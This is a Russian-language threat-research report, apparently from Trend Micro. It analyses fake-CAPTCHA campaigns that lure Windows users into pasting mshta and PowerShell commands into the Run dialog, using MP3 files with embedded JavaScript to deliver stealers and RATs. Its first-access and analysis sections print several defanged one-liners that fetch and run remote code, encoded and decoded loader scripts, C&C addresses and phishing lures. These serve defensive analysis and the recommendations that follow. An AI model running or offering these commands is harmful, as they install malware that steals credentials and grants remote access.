Краткое содержание

Trend™ Research обнаружила волну поддельных страниц CAPTCHA, которые обманывают пользователей, заставляя их вставлять вредоносные команды в диалоговое окно «Выполнить» (Windows Run). Эти кампании используют файлы (например, MP3, PDF) с внедрённым запутанным JavaScript, распространяемым через фишинговые письма, вредоносную рекламу (malvertising) или SEO-отравление. Загрузки исполняются в памяти с использованием mshta.exe или PowerShell, что позволяет часто обходить традиционную файловую детекцию. Эти атаки обеспечивают эксфильтрацию данных, кражу учётных данных, удалённый доступ, развертывание загрузчиков через такие вредоносные программы, как Lumma Stealer, Rhadamanthys, AsyncRAT, Emmenthal и XWorm.

Риски для бизнеса:

• компрометация конечных устройств,

• несанкционированный доступ к данным,

• срыв операций из-за устойчивых бэкдоров и управляющих (C&C) каналов.

Наибольшую угрозу атаки представляют для организаций, работающих в среде Windows с минимальными ограничениями на выполнение скриптов. Кампании эксплуатируют сразу несколько легитимных платформ, включая сервисы обмена файлами, платформы контента и поиска, музыкальные репозитории, средства перенаправления URL и хостинги документов. Атаки основываются на доверии к CAPTCHA-интерфейсам и известным брендам.

Отключение доступа к диалоговому окну «Выполнить», ограничение доступа к публичным платформам обмена файлами и ужесточение настроек браузера могут значительно снизить риск воздействия этой угрозы. Ниже приведены рекомендации по смягчению рисков и обзор решений Trend Micro для защиты от подобных атак.

В последние месяцы в рамках расследований, проводимых службой Trend Micro™ Managed Detection and Response (MDR), зафиксирован существенный рост случаев атак с использованием поддельных CAPTCHA. Такие CAPTCHA попадают к пользователю через фишинговые письма, редиректы по URL, вредоносную рекламу (malvertising) или SEO-отравление. Во всех выявленных случаях наблюдается схожее поведение: пользователю предлагается скопировать и вставить вредоносную команду в окно «Выполнить» (Run) в Windows.

Сценарий далее использует Microsoft HTML Application Host (mshta) либо PowerShell с кодировкой base64, чтобы выполнить высоко запутанную команду, которая, в свою очередь, подключается к другому сайту и загружает многоступенчатые скрипты прямо в память.

Уникальное наблюдение в ходе анализа: такие сайты размещают специально сформированные .mp3-файлы, в которые внедрён и замаскирован JavaScript-код. Это запускает многоэтапный процесс, в результате которого происходит загрузка различных типов вредоносного ПО.

Первичный доступ (Initial Access)

Пользователь сталкивается со страницей CAPTCHA, имитирующей легитимную проверку на «человека», чаще всего при просмотре на первый взгляд безобидных сайтов с контентом. В некоторых случаях жертва попадает на такую страницу через фишинговую рассылку с перенаправлением по URL. Страница содержит инструкцию для пользователя — скопировать и вставить команду в окно «Выполнить» (Win + R) якобы в рамках процесса подтверждения. После запуска эта команда активирует вредоносный скрипт, который устанавливает на устройство различные типы вредоносного ПО.

Ниже приведены примеры команд, которые пользователям предлагалось выполнить (по данным нашего анализа):

• mshta.exe hxxps://ernier[.]shop/lyricalsync[.]mp3 # ''Ι am nοt a rοbοt: САРТСНА Verification UID: 885203

• mshta.exe hxxps://zb-files[.]oss-ap-southeast-1[.]aliyuncs[.]com/DPST_doc.mp3 #  ''Ι am nοt a rοbοt: САРТСНА Verification UID: 815403

• mshta.exe hxxp://ok[.]fish-cloud-jar[.]us/ # "Authentication needed: Secure Code 3V8MUR-9PW4S"

• mshta.exe hxxps://yedik[.]shop/Tech_House_Future[.]mp3 #  ''Ι am nοt a rοbοt: САРТСНА Verification UID: 885203

• mshta.exe hxxps://x63-hello[.]live/nF3mXcQ9FVjs1sMt[.]html #'' I'm human ID241619''

• mshta.exe hxxps://welcome12-world[.]com/wpDoQRpZt2PIffud[.]html #'' I'm human ID233560''

• mshta.exe hxxps://w19-seasalt[.]com/mbDjBsRmxM1LreEp[.]html #'' I'm human ID984662''

• PowerShell.exe -W Hidden -command $uri = 'hxxps[://]fessoclick[.]com/clck/dub.txt'; $content = (Invoke-WebRequest -Uri $uri).Content; Invoke-Expression $content”

• cmd /c "powershell -w h -e aQBlAHgAKABpAHcAcgAgAC0AVQByAGkAIAAnAGgAdAB0AHAAcwA6AC8ALwB2AGkAZQB3AGUAcgAtAHYAYwBjAHAAYQBzAHMALgBjAG8AbQAvAGkAbgAuAHAAaABwAD8AYQBjAHQAaQBvAG4APQAxACcAKQA=" && ✅ I am not a robot - reCAPTCHA ID: 7845

• mshta hxxps://check[.]nejyd[.]icu/gkcxv[.]google?i=db47f2d4-a1c2-405f-ba9f-8188d2da9156 REM ✅ Human, not a robot: Verification САРTCHA ID:658630

• PoWeRsHeLl -w h -c cUr"L.E"x"E" -k -L hxxp"s://ka"j"e"c.icu"/f"04b18c2f7ff"48bdbf06"701"38"f9eb2"4f.txt | pow"e"rs"h"el"l" -

Анализ фишинговых писем показывает повторяющиеся тематические шаблоны. Темы сообщений часто ссылаются на забытые вещи гостей, создают ощущение срочности и апеллируют к вопросам безопасности или конфиденциальности. В письмах, как правило, упоминаются конкретные предметы, якобы оставленные отправителю, и используется официальный, деловой стиль, чтобы повысить доверие и побудить пользователя к немедленным действиям.

Примеры тем писем:

• Требуется действие — Ценные вещи гостя оставлены

• Требуется внимание: Найдены личный дневник и документы гостя

• Критическое уведомление: Ячейка хранения гостя осталась незапертой

• Срочное уведомление: Медицинское оборудование гостя оставлено на территории

• Последняя попытка: Дорогие вещи гостя остались в номере — требуется немедленное действие

• Оставленные вещи гостя на вашей территории — требуется немедленное внимание

• Предмет высокого риска: Конфиденциальный ноутбук гостя остался без присмотра

• Необходим немедленный контакт — Вещи гостя

• Юридический и охранный вопрос: Паспорт гостя и иммиграционные документы забыты

• Обновление «Потерянное и найденное»: Обнаружены электронные устройства гостя

• Пожалуйста, свяжитесь с гостем — Забытые вещи

• Переслано: Срочно — Найдены утерянные кредитные карты гостя

• Оповещение безопасности: Ноутбук и телефон гостя остались на объекте

• Срочно: Найдены утерянные кредитные карты гостя

• Срочное внимание — Вещи гостя в вашем отеле

• Срочный инцидент безопасности: Не востребованы удостоверяющие документы гостя

Встроенные URL-ссылки в каждом фишинговом письме эксплуатируют доверие к легитимным доменам, таким как https://xxx[.]51.ca и hxxps://www[.]xxxnet.dk, чтобы казаться надёжными для ничего не подозревающих пользователей. Однако при переходе по ним эти ссылки перенаправляют пользователя на фальшивые страницы с CAPTCHA, которые используются как прикрытие для атаки.

• hxxps://sns[.]xx[.]ca/link[.]php?url=///guests-reservid[.]com

• hxxps://sns[.]xx[.]ca/link[.]php?url=///guest-idreserve[.]com

• hxxps://sns[.]xx[.]ca/link[.]php?url=///idguset-reserve[.]com

• hxxps://sns[.]xx[.]ca/link[.]php?url=///guestdocfound[.]com

• hxxps://sns[.]xx[.]ca/link[.]php?url=///itemsfoundguest[.]com

• hxxps://sns[.]xx[.]ca/link[.]php?url=///guestitemsfound[.]com

• hxxps://www[.]xxxnet[.]dk/out[.]php?link=///guests-reservid[.]com

В некоторых случаях фишинговые письма включают вложение в формате PDF вместо прямой ссылки в теле письма. При открытии такой PDF-файл перенаправляет пользователя на фальшивую страницу с CAPTCHA. В приведённом ниже примере PDF-документа пользователь оказывается на поддельной странице после нажатия на встроенную ссылку:hxxps://viewer-vccpass[.]com.

Деятельность была зафиксирована с помощью телеметрии Trend Vision One, что позволило провести более глубокий анализ влияния каждого инцидента. В другом примере, представленном ниже, переход по ссылке из письма, полученного в Outlook, запускает браузер Microsoft Edge и перенаправляет пользователя на фальшивую CAPTCHA-страницу:guest-idreserve[.]com.

Злоумышленники также используют SEO-отравление (SEO poisoning), чтобы заманивать жертв на фальшивые страницы с CAPTCHA. В одном из случаев пользователь искал в Google информацию о «Longleat House».

Анализ истории браузера с помощью форензик-модуля в Trend Vision One позволил точно установить поисковый запрос: «Longleat House Entrance».

Как показано на рисунке 5, при поиске этой фразы в результатах появлялся один из первых сайтов, — взломанный легитимный ресурс, который перенаправлял пользователя на поддельную CAPTCHA-страницу.

Переход на сайт приводит пользователя на фальшивую страницу с CAPTCHA, которая инструктирует вставить замаскированную вредоносную команду в окно «Выполнить» (Run). После выполнения эта команда запускает удалённый скрипт напрямую в памяти, минуя файловую систему.

Для наглядности мы сосредоточимся на анализе атак с поддельной CAPTCHA, в которых вредоносные скрипты встраиваются в MP3-файлы, поскольку такая техника является уникальной. Хотя конкретные скрипты и этапы могут различаться от случая к случаю, общая структура и поведение остаются одинаковыми.

Согласно телеметрии, mshta запускает файл lyricalsync.mp3 — специально сформированный MP3-файл, размещённый на ресурсе:hxxps://ernie[.]shop.

File path: C:\Windows\System32\mshta.exe"C:\WINDOWS\system32\mshta.exe" hxxps://ernier[.]shop/lyricalsync.mp3 # ''Ι am nοt a rοbοt: САРТСНА Verification UID: 885203C:\Users\srt\AppData\Local\Microsoft\Windows\INetCache\IE\TKYD709X\lyricalsync.mp3

Согласно данным Threat Intelligence, были выявлены несколько URL-источников перехода (referrer URLs), связанных с hxxps://ernier[.]shop/lyricalsync[.]mp3. Переход по этим ссылкам приводит пользователя на страницы с поддельной CAPTCHA, где ему предлагается скопировать и вставить вредоносную команду в окно «Выполнить» (Run). Такое поведение сохраняется во всех изученных нами случаях.

Хотя конкретные URL-адреса, на которых размещён MP3-файл, могут отличаться, каждый из них содержит referrer-ссылку, которая в итоге перенаправляет пользователя на поддельную CAPTCHA-страницу.

Переход по одному из этих referrer-URL-адресов приводит пользователя на фальшивую CAPTCHA-страницу, где отображаются такие надписи, как «Verify You Are Human» (Подтвердите, что вы человек), «I'm not a robot» (Я не робот)

Когда пользователь нажимает кнопку «I'm not a robot» (Я не робот), ему предлагается скопировать и выполнить вредоносный код на своём устройстве. В приведённом примере на экране отображается следующее:

Как и в других кампаниях с поддельными CAPTCHA, злоумышленники активно обновляют как URL-адреса, так и скрипты, размещённые на этих сайтах. Как показано на рисунке 11, всего через один день после первичного анализа был использован уже другой URL, и внешний вид страницы также изменился. Эта тактика позволяет сохранять непрерывность операции: если один URL блокируется или удаляется, атака быстро переносится на новый адрес, продолжая действовать без перерыва.

Каждая поддельная CAPTCHA-страница содержит скрипт, который динамически генерирует и копирует в буфер обмена команду mshta. Эта команда указывает на удалённый сайт, где размещён вредоносный HTA- или MP3-файл. Команда закодирована в Base64 и использует JavaScript для автоматической декодировки и копирования в буфер обмена.

Файл lyricalsync.mp3 содержит JavaScript с многоступенчатым кодированием: сначала в Base64, затем в шестнадцатеричном формате. На первый взгляд, это обычный аудиофайл — при воспроизведении звучит песня “Done With You” группы Reign on Me.

В некоторых случаях аудиофайл напрямую встроен в веб-страницу.

Анализ заголовков MP3-файлов из различных случаев выявил общую закономерность: многие из них, по-видимому, были получены с сайта бесплатной музыки www[.]jamendo[.]com. Злоумышленники, судя по всему, загружают легитимные аудиофайлы, внедряют в них вредоносный JavaScript и используют как средство доставки вредоносного ПО.

Файл lyricalsync.mp3 содержит запутанный JavaScript-код (обнаруживается как Trojan.JS.EMMENHTAL.SM). При запуске через mshta активируется этот скрипт, который проходит через несколько этапов дешифровки перед тем, как выполнить основной вредоносный код. Аналогичные техники были выявлены и в других инцидентах.

Когда файл lyricalsync.mp3 запускается через mshta, активируется многоступенчатый процесс деобфускации, специально разработанный для обхода механизмов обнаружения. Ниже представлен пример:

Скрипт первого уровня (кодировка Base64):

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w h -nop -ep un -E JABSAHgAVQB6ACAAPQAgACcANgA5ADYANQA3ADgANQAzADcANAA2ADEANwAyADcANAAyAEQANQAwADcAMgA2AEYANgAzADYANQA3ADMANwAzADIAMAAyADIAMgA0ADYANQA2AEUANwA2ADMAQQA1ADcANAA5ADQARQA0ADQANAA5ADUAMgA1AEMANQAzADcAOQA3ADMANQA3ADQARgA1ADcAMwA2ADMANAA1AEMANQA3ADYAOQA2AEUANgA0ADYARgA3ADcANwAzADUAMAA2AEYANwA3ADYANQAv <redacted>

Скрипт второго уровня (шестнадцатеричная кодировка):

$RxUz = '69657853746172742D50726F63657373202224656E763A57494E4449525C537973574F5736345C57696E646F7773506F7765725368656C6C5C76312E305C706F7765727368656C6C2E65786522202D417267756D656E744C69737420272D4E6F50726F66696C65272C272D457865637574696F6E506F6C696379272C27556E72657374726963746564272C272D436F6D6D616E64272C27535620396620285B4E65742E576<redacted>' -split '(.{2})' | Where-Object {$_} | ForEach-Object {[char]([convert]::ToInt32($_,16))};$RxUz = $RxUz -join ''; & $RxUz.Substring(0,3) $RxUz.Substring(3)

Итоговый полностью декодированный скрипт:

iex "Start-Process \"$env:WINDIR\SysWOW64\WindowsPowerShell\v1.0\powershell.exe\" -ArgumentList '-NoProfile','-ExecutionPolicy','Unrestricted','-Command','SV 9f ([Net.WebClient]::New());SV 09h ''https://bi[.]yuoie[.]shop/750413b4e6897a671bc759e04597952a0be747830189873b.xlsx'';Set-Item Variable:/Ob9 (((( [Net.WebClient]::New()|Member)|Where-Object{(Get-ChildItem Variable:_).Value.Name-like'*nl*g*'}).Name));(Variable utit).Value|ForEach-Object{(Get-ChildItem Variable:_).Value.InvokeCommand.( ( (Variable utit).Value.InvokeCommand.PsObject.Methods|Where-Object{(Get-ChildItem Variable:_).Value.Name-like'*k*ript*'}).Name)}( (9f).Value.(GCI Variable:\Ob9).Value)(Item Variable:09h).Value}' -WindowStyle Hidden;$yiZLHS = $env:AppData;function qhlncfrI($oDusI, $lHglEMM){curl $oDusI -o $lHglEMM};function WpKhSwg(){function ELPZqDpBs($rurDrA){if(!(Test-Path -Path $lHglEMM)){qhlncfrI $rurDrA $lHglEMM}}}WpKhSwg;

Итоговый декодированный PowerShell-скрипт сначала запускает новый процесс PowerShell с политикой выполнения Unrestricted и без использования пользовательского профиля (-NoProfile), чтобы обойти механизмы обнаружения. Далее он создаёт объект WebClient для подключения и загрузки файла с внешнего URL: https://bi.yuoie[.]shop/750413b4e6897a671bc759e04597952a0be747830189873b.xlsx.

На момент анализа этот файл содержал ещё один сильно обфусцированный PowerShell-скрипт. Файл загружается по локальному пути, предположительно в директорию данных приложений текущего пользователя :

path: C:\Users\<username>\AppData\Roaming\750413b4e6897a671bc759e04597952a0be747830189873b.xlsx

Чтобы избежать обнаружения, скрипт выполняется в скрытом окне. В его структуре предусмотрены функции, которые проверяют, существует ли целевой файл по указанному пути, если файл отсутствует, используют псевдоним curl в PowerShell для его загрузки.

Файл PowerShell-скрипта с именем 750413b4e6897a671bc759e04597952a0be747830189873b.xlsx, замаскированный под документ Excel, при выполнении устанавливал соединение со следующими доменами:

• buyvault[.]shop

• bi.yuoei[.]shop

Затем выполняется инъекция кода в svchost.exe, который запускает легитимный файл C:\Windows\System32\OOBE-Maintenance.exe. Этот файл используется для подключения к следующему серверу управления и контроля (C&C): 176[.]65[.]141[.]165:8587.

Далее запускается браузер на основе Chromium (например, Google Chrome) с использованием временного пользовательского профиля, расположенного по пути C:\Users\srt\AppData\Local\Temp\chrxxxx.tmp. При этом отключается GPU, разрешается порт 8000, и открывается потенциально вредоносный локальный веб-сервер на 127.0.0.1:8000, предположительно являющийся частью C&C-коммуникаци:

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe--user-data-dir="C:\Users\srt\AppData\Local\Temp\chr18E2.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/356e38cd/8ed4f620"

C:\Program Files\Google\Chrome\Application\chrome.exe
--user-data-dir="C:\Users\srt\AppData\Local\Temp\chr4D53.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/356e38cd/30a0f650"

Помимо Lumma Stealer, было зафиксировано вмешательство в процесс C:\Program Files\Windows Media Player\wmplayer.exe, который затем создавал AvastBrowserUpdate.exe и загружал вредоносную библиотеку goopdate.dll. Для выполнения вредоносного кода использовалась техника DLL sideloading. Данный компонент был классифицирован как PUA.Win32.FakeGoop.A.component:

• C:\Users\srt\AppData\Roaming\IPEvcon\AvastBrowserUpdate.exe

• C:\Users\srt\AppData\Roaming\IPEvcon\goopdate.dll (3e2794400664f6ae9a9b27821bf01ca008f99e1d)

В другом случае мы наблюдали, что закодированный MP3-файл обращался к другому URL для загрузки и выполнения ещё одного сильно обфусцированного скрипта PowerShell. Он связывался с файлообменным сайтом MediaFire (download2431[.]mediafire[.]com), чтобы загрузить полезную нагрузку второго этапа, которая в итоге приводила к запуску Lumma Stealer.

Атрибуция полезной нагрузки

Наш анализ техники фальшивых CAPTCHA выявил разнообразные, но взаимосвязанные индикаторы компрометации (IoC), связанные с рядом известных семейств вредоносного ПО. Используя перекрёстные связи между URL-адресами и телеметрию VirusTotal, мы установили с высокой степенью уверенности связи между инфраструктурой доставки и различными семействами вредоносов. Этот метод позволил выявить кластеры, связанные с Lumma Stealer, Emmenhtal, Rhadamanthys, AsyncRAT и XWorm. Ниже приведён обзор того, как эти IoC связаны с каждым из обнаруженных в кампании вредоносных образцов:

Lumma Stealer: Несколько URL-адресов, связанных через граф связей в VirusTotal, указывают на известные узлы распространения Lumma Stealer.

Emmenhtal: Привязка к вредоносному ПО Emmenhtal основана на выявленных совпадениях в инфраструктуре командных серверов (C&C) и механизмах доставки вредоносов. Элементы, обнаруженные в рамках текущей кампании, совпадают с ранее задокументированными индикаторами, связанными с активностью Emmenhtal, что усиливает обоснованность данной атрибуции.

Rhadamanthys: Связь с этим вредоносным ПО подтверждается совпадениями в инфраструктуре, выявленными на основе исторических загрузок вредоносных файлов и связей между хранилищами. Изображение ниже демонстрирует эти взаимосвязи, укрепляя атрибуцию к известной активности Rhadamanthys.

AsyncRAT / XWorm: общий URL-адрес доставки 185[.]7[.]214[.]108/a[.]mp4 используется для размещения вредоносных загрузчиков, идентифицированных как AsyncRAT и XWorm. Анализ графа связей в VirusTotal подтвердил, что данный IP-адрес многократно применялся для хостинга удалённых троянов (RAT) и легковесных дропперов, что указывает на использование мультипейлоадных или модульных загрузчиков в зависимости от среды целевой системы.

Рекомендации по обеспечению безопасности от атак с поддельными CAPTCHA

Кампании с использованием фальшивых CAPTCHA продолжают развиваться, демонстрируя всё большую изощрённость. Злоумышленники применяют продвинутые приёмы, включая многоступенчатую обфускацию, исполнение скриптов в памяти и, в отдельных случаях, внедрение зашифрованного JavaScript в безобидные на вид MP3-файлы. Основные каналы доставки — фишинговые письма с вредоносными ссылками или вложениями, а также вредоносная реклама на ненадёжных сайтах.

Независимо от точки входа, цепочка атаки, как правило, базируется на обфусцированных JavaScript- или PowerShell-скриптах, предназначенных для извлечения и выполнения различных вредоносных нагрузок. Часто они распространяются через загрузчики вроде Emmenhtal, которые затем загружают вредоносы-крадоны (Lumma Stealer, Rhadamanthys) или RAT-инструменты (AsyncRAT, XWorm).

Ожидается, что в будущем злоумышленники будут внедрять полезные нагрузки и в другие нестандартные форматы помимо MP3 и HTA. Хотя фишинг и вредоносная реклама по-прежнему остаются основными методами распространения, возможен переход к платформам социальных сетей и мессенджерам с использованием сокращённых или замаскированных ссылок.

Продолжительное использование mshta.exe и PowerShell обусловлено их наличием во многих средах. Однако в будущем возможна активизация применения других системных утилит (LOLBins) для обхода защит, таких как rundll32 и regsvr32.

Лучшие практики защиты от атак с поддельными CAPTCHA:

• Отключите доступ к диалогу «Выполнить» (Win + R).
  В средах, где важно ограничить доступ к административным инструментам и выполнение скриптов, рекомендуется запретить запуск диалога «Выполнить». Это снижает риск выполнения вредоносных команд PowerShell или MSHTA и ограничивает злоупотребление встроенными средствами Windows.

• Применяйте принцип наименьших привилегий.
  Помимо блокировки «Выполнить», предоставляйте пользователям только необходимые права доступа. Это включает запрет на запись и выполнение в чувствительных каталогах, отключение выполнения скриптов, где это не требуется, и запрет повышения привилегий до администратора без утверждённого процесса. Снижение уровня привилегий ограничивает возможности как пользователей, так и вредоносного ПО по внесению критических изменений.

• Ограничьте доступ к несанкционированным инструментам и платформам обмена файлами.
  Поддерживайте список утверждённого ПО и блокируйте доступ к публичным файлообменникам, если они не требуются для работы. Это минимизирует риск загрузки вредоносного контента и мешает злоумышленникам распространять дополнительные компоненты.

• Мониторьте подозрительное поведение буфера обмена и процессов.
  Атаки показали, что пользователи могут быть вынуждены вставить и выполнить вредоносную команду из буфера обмена. Отслеживание аномальной активности — таких как закодированные команды или подозрительные скрипты — может служить ранним индикатором угрозы. Также необходимо отслеживать поведение процессов: медиа-плееры или браузеры, запускающие неожиданные исполняемые файлы или интерпретаторы скриптов, могут указывать на доставку вредоносной нагрузки.

• Ужесточите настройки браузера.
  Настройте браузеры для защиты от SEO-подмены, вредоносной рекламы и скриптовых атак. Это включает блокировку выполнения JavaScript на ненадёжных сайтах, включение фильтров рекламы, отключение автозапуска и смешанного контента, удаление лишних расширений — особенно устаревших или с повышенными правами.

• Включите функции защиты памяти.
  В Windows есть встроенные механизмы, которые позволяют выявлять выполнение кода в памяти, инъекции DLL и другие уклоняющиеся техники. Эти механизмы защищают от многоступенчатых атак без файлов, обходящих классические антивирусные решения.